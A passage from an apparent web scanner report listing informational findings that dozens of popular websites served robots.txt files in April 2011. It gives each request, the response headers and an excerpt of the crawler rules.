Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.angieslist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.angieslist.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 12:46:37 GMT
Accept-Ranges: bytes
ETag: "a7d27b82d8eecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:00:59 GMT
Connection: close
Content-Length: 526

User-agent: 008
Disallow: /

User-agent: *
Sitemap: http://www.angieslist.com/sitemap/sitemap.xml
Disallow: /b/
Disallow: /c/
Disallow: /AngiesList/*
Disallow: /Angieslist/*
Disallow: /ang
...[SNIP]...

24.58. http://www.answerbag.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.answerbag.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:09 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8d PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 121
Connection: close
Content-Type: text/html; charset=utf-8

User-agent: *

Disallow:/a_view*
Disallow:/profile*
Disallow:/search

Sitemap: http://www.answerbag.com/sitemap_index.xml

24.59. http://www.aolnews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:20 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 583
Keep-Alive: timeout=5, max=999813
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /_uac/adpage.html
Disallow: /index/
Disallow: /category/test-healthcare/
Disallow: /category/catholic-church-sexual-abuse-scandal/
Disallow: /_a/
Disallow: /article/do-no
...[SNIP]...

24.60. http://www.apartmentguide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartmentguide.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:08 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n20 ( iad-agg-n22), ht iad-agg-n22.panthercdn.com
Cache-Control: max-age=1800
Expires: Sat, 02 Apr 2011 13:58:20 GMT
Age: 828
Content-Length: 435
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 11:50:51 GMT
X-Varnish: 486723501
X-Cache: MISS
Connection: close

User-Agent: *

#
# Sitemap Global Search Engine Ping (Google, Yahoo, MSN, Ask)
#

SITEMAP: http://www.apartmentguide.com/sitemap.xml
Disallow: /apartments/search/*
Disallow: /apartments/print/*
Disall
...[SNIP]...

24.61. http://www.apartmenthomeliving.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmenthomeliving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartmenthomeliving.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 13:52:10 GMT
Accept-Ranges: bytes
Content-Length: 760
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: iisbot
Disallow: /

User-agent: Slurp
Crawl-delay: 1
Disallow: /apartment_managers/
Disallow: /apartment_stamps/
Disallow: /apartment_search/
Disallow: /members/
Disallow: /videoc
...[SNIP]...

24.62. http://www.apartmentratings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentratings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartmentratings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:42 GMT
Server: Apache
Last-Modified: Wed, 18 Aug 2010 21:44:46 GMT
ETag: "1cf3b5-398-48e1ff9632f80"
Accept-Ranges: bytes
Content-Length: 920
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 14:03:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerapt-www_POOL=1189351596.0.0000; path=/

User-agent: *
Disallow: /review/branding/nav.jsp
Disallow: /rate?a=r
Disallow: /data

User-agent: URL_Spider_Pro
Disallow: /

User-agent: CherryPicker
Disallow: /

User-agent: EmailCollector
Disallow:
...[SNIP]...

24.63. http://www.apartments.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartments.com

Response

HTTP/1.1 200 OK
Content-Length: 645
Content-Type: text/plain
Last-Modified: Fri, 18 Mar 2011 13:07:26 GMT
Accept-Ranges: bytes
ETag: "7765c26d6de5cb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:19 AM&lastactivitytime=4/2/2011 8:45:19 AM&visitid=da00cefd-afdf-4671-82f3-f553bd8519de&visitorid=430e7eb8-3e15-4ac5-9708-40d704a7debf&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:19 GMT; path=/
Set-Cookie: AptAff=d337643d48565017cce897f6a04ff96366d9db60dfceba203ff36b6c04fcdec5;Path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:19 AM&lastactivitytime=4/2/2011 8:45:19 AM&visitid=da00cefd-afdf-4671-82f3-f553bd8519de&visitorid=430e7eb8-3e15-4ac5-9708-40d704a7debf&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:18 GMT
Connection: close
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

# robots.txt for Apartments.com
# see http://www.robotstxt.org/wc/norobots.html

User-Agent: OmniExplorer_Bot
Disallow: /

User-agent: *
Disallow: /cgi-bin
Disallow: /private

User-agent: *
...[SNIP]...

24.64. http://www.apple.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 06 Jan 1998 23:24:02 GMT
ETag: "41-3241c557be880"
Server: Apache/2.2.11 (Unix)
nnCoection: close
X-Cache-TTL: 600
X-Cached-Time: Wed, 04 Aug 2010 21:30:00 GMT
Content-Type: text/plain; charset=utf-8
Cteonnt-length: 65
Cache-Control: max-age=298
Expires: Sat, 02 Apr 2011 12:47:48 GMT
Date: Sat, 02 Apr 2011 12:42:50 GMT
Content-Length: 65
Connection: close

# robots.txt for http://www.apple.com/
User-agent: *
Disallow:


24.65. http://www.apples4theteacher.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apples4theteacher.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apples4theteacher.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 17 Dec 2010 23:27:01 GMT
ETag: "9fbb3d-305-497a381dc3b40"
Accept-Ranges: bytes
Content-Length: 773
Connection: close
Content-Type: text/plain

# Robots.txt file from http://www.apples4theteacher.com
#
# All robots will spider the domain

User-agent: Googlebot
Disallow: /swfs*/

User-agent: Slurp
Crawl-delay: 10

User-agent: *
Disa
...[SNIP]...

24.66. http://www.archive.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archive.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.archive.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.32
Date: Sat, 02 Apr 2011 13:36:06 GMT
Content-Type: text/plain
Content-Length: 627
Last-Modified: Tue, 08 Mar 2011 00:34:01 GMT
Connection: close
Expires: Sat, 02 Apr 2011 19:36:06 GMT
Cache-Control: max-age=21600
Accept-Ranges: bytes

##############################################
#
# Welcome to the Archive!
#
##############################################
# Please crawl our files.
# We appreciate if you can crawl responsibly.
# St
...[SNIP]...

24.67. http://www.areaconnect.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.areaconnect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.areaconnect.com

Response

HTTP/1.1 200 OK
Content-Length: 510
Content-Type: text/plain
Last-Modified: Wed, 18 Aug 2010 19:42:05 GMT
Accept-Ranges: bytes
ETag: "5e1eb96fd3fcb1:1686"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:04 GMT
Connection: close

# robots.txt
# Please, we do NOT allow non-se spiders any longer.

User-agent: *
Disallow: /odp
Disallow: /localsites
Disallow: /directory
Disallow: /ads
Disallow: /search
Disallow: /premierlocal
Disa
...[SNIP]...

24.68. http://www.articlesbase.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.articlesbase.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.articlesbase.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:48 GMT
Server: Apache/2
Last-Modified: Thu, 31 Mar 2011 15:35:17 GMT
ETag: "1740-49fc90a4e7740"
Accept-Ranges: bytes
Content-Length: 5952
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:26:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Slurp
Crawl-delay: 3

User-Agent: MediaPartners-Google
Allow: *

Sitemap: http://www.articlesbase.com/articles_sitemap_index.xml

User-agent: *
Disallow: /ads/
Disallow: /images/
Disallow:
...[SNIP]...

24.69. http://www.askmen.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.askmen.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Last-Modified: Wed, 10 Nov 2010 21:26:23 GMT
ETag: "bca6ef-118-494b9825ab565"-gzip
ServerHost: askmen07.sc4.colo.fimops.com
Content-Type: text/plain; charset=iso-8859-1
Expires: Sat, 02 Apr 2011 13:26:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:26:34 GMT
Content-Length: 280
Connection: close
Set-Cookie: NSC_btlnfo_iuuq_wjq=ffffffff090f1b3445525d5f4f58455e445a4a423660;path=/;httponly

Sitemap: http://www.askmen.com/video-sitemap.xml
Sitemap: http://www.askmen.com/sitemap.xml
User-agent: *
Disallow: /search/
Disallow: /feeder/askmenRSS_article_print_2006.php
...[SNIP]...

24.70. http://www.associatedcontent.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.associatedcontent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.associatedcontent.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:14 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Tue, 16 Nov 2010 23:52:20 GMT
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

Sitemap: http://www.associatedcontent.com/sitemap_index.xml
# Allow all
User-agent: e-SocietyRobot
Disallow: /
# Disallow bitly_proxy
User-agent: *
Disallow: /bitly_proxy.shtml

24.71. http://www.astrology.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.astrology.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.astrology.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 30 Mar 2011 21:10:14 GMT
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:45:45 GMT
Date: Sat, 02 Apr 2011 13:45:45 GMT
Content-Length: 166
Connection: close

# Everyone allowed
User-agent: *
Disallow: /partnerpages/toolbar

# Our gsa
User-agent: ivillagegsa
Disallow: /*.rss$

Sitemap: http://www.astrology.com/site_map.xml

24.72. http://www.atom.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atom.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"403-1300820242000"
Last-Modified: Tue, 22 Mar 2011 18:57:22 GMT
Content-Type: text/plain
Content-Length: 403
INFO_HOST: www.atom.com
Cache-Control: max-age=743
Expires: Sat, 02 Apr 2011 14:10:03 GMT
Date: Sat, 02 Apr 2011 13:57:40 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:57:40 GMT; path=/
Vary: User-Agent

# robots.txt for Scenic Site blocking

User-agent: *
Disallow: /scenic/
Disallow: /services/
Disallow: /isis/
Disallow: /ucsa/
Disallow: /admin/
Disallow: /poll/
Disallow: /gameservices/
Disallow: /bl
...[SNIP]...

24.73. http://www.att.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.att.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 15 Mar 2011 20:02:48 GMT
ETag: "356f68-3cc-e98f4a00"
Accept-Ranges: bytes
Content-Length: 972
P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:37:48 GMT
Connection: close

User-agent: *
Disallow: /Common/indc/popup/
Disallow: /Common/popup/
Disallow: /dsl/shop/fragments/
Disallow: /esupport/dyn/servlet/
Disallow: /esupport/sender/
Disallow: /esupport/stayconnected
...[SNIP]...

24.74. http://www.autotrader.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autotrader.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:48 GMT
Server: Apache
Set-Cookie: v1st=A4F56B4DC789BB77; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1301750748491554; path=/; expires=Thu, 12-Mar-15 13:25:48 GMT; domain=.autotrader.com
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Accept-Ranges: bytes
Content-Length: 439
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerAT-Production_hhtp=930440714.61475.0000; path=/

User-agent: *
Disallow: /fyc # This is an infinite virtual URL space
Disallow: /inventory # This is an infinite virtual URL space

# Start Home Page Test
Disallow: /index_hpra0.jsp
Disallow: /index_h
...[SNIP]...

24.75. http://www.autotraderstatic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autotraderstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:40 GMT
Content-Length: 83
Connection: close
Set-Cookie: M7F1=CT; expires=Sat, 30-Apr-2011 13:31:40 GMT; path=/; domain=autotraderstatic.com
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELi OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV;"

User-agent: *
Disallow: / # No indexing of www.autotraderstatic.com pages allowed


24.76. http://www.autozone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autozone.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autozone.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:05 GMT
X-Powered-By: Tomcat/JBOSS
Last-Modified: Thu, 31 Mar 2011 20:32:48 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 628
Vary: Accept-Encoding
Set-Cookie: NSC_bvupapof.dpn=e795367f3660;Version=1;path=/
Keep-Alive: timeout=2, max=42
Connection: Keep-Alive
Set-Cookie: NSC_bvupapof.dpn=e795366b3660;Version=1;path=/

User-agent: *
Disallow: /autozone/cart/
Disallow: /autozone/checkout/
Disallow: /autozone/ymme/
Disallow: /autozone/common/selectStore.jsp
Disallow: /autozone/catalog/common/add_to_cart.jsp
Disa
...[SNIP]...

24.77. http://www.avast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.avast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.avast.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "362055514"
Last-Modified: Tue, 04 May 2010 08:04:00 GMT
Content-Length: 224
Connection: close
Date: Sat, 02 Apr 2011 13:38:03 GMT
Server: httpd

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi
Disallow: /~kubecj/data
Disallow: /connections
Disallow: /classes
Disallow: /~kubecj/data
Disallow: /go.php
Disallow: /phone-support-survey
Dis
...[SNIP]...

24.78. http://www.azcentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.azcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.azcentral.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Mon, 04 Aug 2008 20:05:11 GMT
Accept-Ranges: bytes
Content-Length: 76
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-Agent: *
Allow: /

Sitemap: http://www.azcentral.com/sitemapindex.xml


24.79. http://www.b2byellowpages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2byellowpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.b2byellowpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:08:56 GMT
Server: Apache
Last-Modified: Fri, 21 Jan 2011 18:58:01 GMT
ETag: "281a402-110a-49a5fd4498040"
Accept-Ranges: bytes
Content-Length: 4362
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots, scram!

User-agent: Mediapartners-Google*
Disallow: /.ssh/
Disallow: /_b2bframe_domain_header/
Disallow: /_new_template/
Disallow: /_oldtemplates/
Disallow: /admin/
Disallow: /ad
...[SNIP]...

24.80. http://www.babble.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babble.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babble.com

Response

HTTP/1.1 200 OK
Content-Length: 424
Content-Type: text/plain
Last-Modified: Thu, 06 Aug 2009 17:59:37 GMT
Accept-Ranges: bytes
ETag: "4daba3a9bf16ca1:1054"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:17 GMT
Connection: close

Sitemap: http://www.babble.com/sitemap.ashx

User-agent: *
Disallow: /adminhome/
Disallow: /useraccounting/
Disallow: /cs/error.htm
Disallow: /cs/error-notfound.aspx
Disallow: /cs/login.aspx
D
...[SNIP]...

24.81. http://www.babelgum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babelgum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babelgum.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
ETag: "aa43a9-636-490c48bb928c0"
Server: Apache/2.2.16
Age: 26725
Date: Sat, 02 Apr 2011 13:41:20 GMT
Last-Modified: Tue, 21 Sep 2010 12:55:39 GMT
Content-Length: 1590
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.82. http://www.babiesrus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babiesrus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babiesrus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:39 GMT
Server: Apache/2.0.63 (Unix)
Vary: Host,Accept-Encoding
Last-Modified: Sat, 29 Nov 2008 04:25:07 GMT
ETag: "540e73-17d-45ccc5ccf0ec0"
Accept-Ranges: bytes
Content-Length: 381
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:27:39 GMT
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /reviews/
Disallow: /coreg/
Disallow: /fsrscripts/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /ControllerServlet/
Disallow: /ema
...[SNIP]...

24.83. http://www.babycenter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babycenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babycenter.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Mar 2011 01:17:23 GMT
ETag: "15c"
Cteonnt-Length: 348
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:25:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:25:45 GMT
Content-Length: 348
Connection: close

User-agent: *
Disallow: /html/ad.html
Disallow: /html/thirdPartyPixel.html
Disallow: /html/3rdParty/
Disallow: /components/ad/display_ad.htm
Disallow: /track/diapers.htm
Disallow: /ratingForm.htm
Disa
...[SNIP]...

24.84. http://www.babylon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babylon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babylon.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.27
Date: Sat, 02 Apr 2011 13:35:43 GMT
Content-Type: text/plain
Content-Length: 128
Last-Modified: Mon, 12 Oct 2009 12:45:40 GMT
Connection: close
Accept-Ranges: bytes

# Robots.TXT for http://www.babylon.com

User-agent: *
Disallow: /forms
Disallow: /style
Disallow: /templates

Disallow: /*.BGL$

24.85. http://www.backpage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backpage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.backpage.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "28-477946db"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 50199
Date: Sat, 02 Apr 2011 13:32:54 GMT
Last-Modified: Mon, 31 Dec 2007 19:45:31 GMT
Content-Length: 40
Connection: close

User-agent: *
Disallow:
Crawl-Delay: 30

24.86. http://www.backtype.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backtype.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.backtype.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:36:52 GMT
Content-Type: text/plain
Content-Length: 1370
Last-Modified: Mon, 28 Feb 2011 09:20:29 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

User-agent: Googlebot
Disallow: /*?
Disallow: /*.php$
Disallow: /ajax/
Disallow: /anonymous/
Disallow: /connect/
Disallow: /domain/
Disallow: /forgot
Disallow: /home
Disallow: /home/
Disallow: /me
Dis
...[SNIP]...

24.87. http://www.baidu.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.baidu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.baidu.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:12 GMT
Server: Apache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=EE3BB7958D961AB11328218E7CA0AE12:FG=1; expires=Sun, 01-Apr-12 13:56:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Last-Modified: Wed, 05 Jan 2011 13:25:33 GMT
ETag: "75-4991951d52d40"
Accept-Ranges: bytes
Content-Length: 117
Vary: Accept-Encoding,User-Agent
Connection: Close
Content-Type: text/plain

User-agent: Baiduspider
Disallow: /baidu

User-agent: *
Disallow: /shifen/
Disallow: /homepage/
Disallow: /cpro

24.88. http://www.bankofamerica.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:42:49 GMT
Content-length: 1298
Content-type: text/plain
Last-modified: Sun, 20 Mar 2011 05:57:57 GMT
Accept-ranges: bytes
Connection: close
Set-Cookie: BIGipServerngen-www.80=3058087595.20480.0000; path=/

User-agent: * # applies to all robots
Disallow: /global     # disallow indexing of restricted areas
Disallow: /cfdocs
Disallow: /thirdparty
Disallow: /directbenefits
Disallow: /groupbanking

...[SNIP]...

24.89. http://www.bankrate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankrate.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Jan 2011 16:32:12 GMT
ETag: "8112114476b2cb1:781c"
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb01
X-Powered-By: ASP.NET
Cache-Control: max-age=129600
Date: Sat, 02 Apr 2011 13:37:13 GMT
Content-Length: 7620
Connection: close

User-agent: gsa-crawler # directed to internal search agent
Disallow: /0cec13ff-2603-4b90-95a1-7fac46411985/
Disallow: /acc_random*
Disallow: /brm_c/
Disallow: /brm/_private/
Disallow: /brm/_Sc
...[SNIP]...

24.90. http://www.barnesandnoble.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barnesandnoble.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barnesandnoble.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 29 Sep 2010 20:58:07 GMT
ETag: "1c34241960cb1:195c"
Content-Length: 137
Cache-Control: max-age=40079
Expires: Sun, 03 Apr 2011 00:33:13 GMT
Date: Sat, 02 Apr 2011 13:25:14 GMT
Connection: close


# www

User-agent: *
Disallow: /reviews/reviews.asp

User-agent: Yahoo! Slurp
Crawl-delay: 1
Disallow: /reviews/reviews.asp


24.91. http://www.bathandbodyworks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bathandbodyworks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bathandbodyworks.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:44 GMT
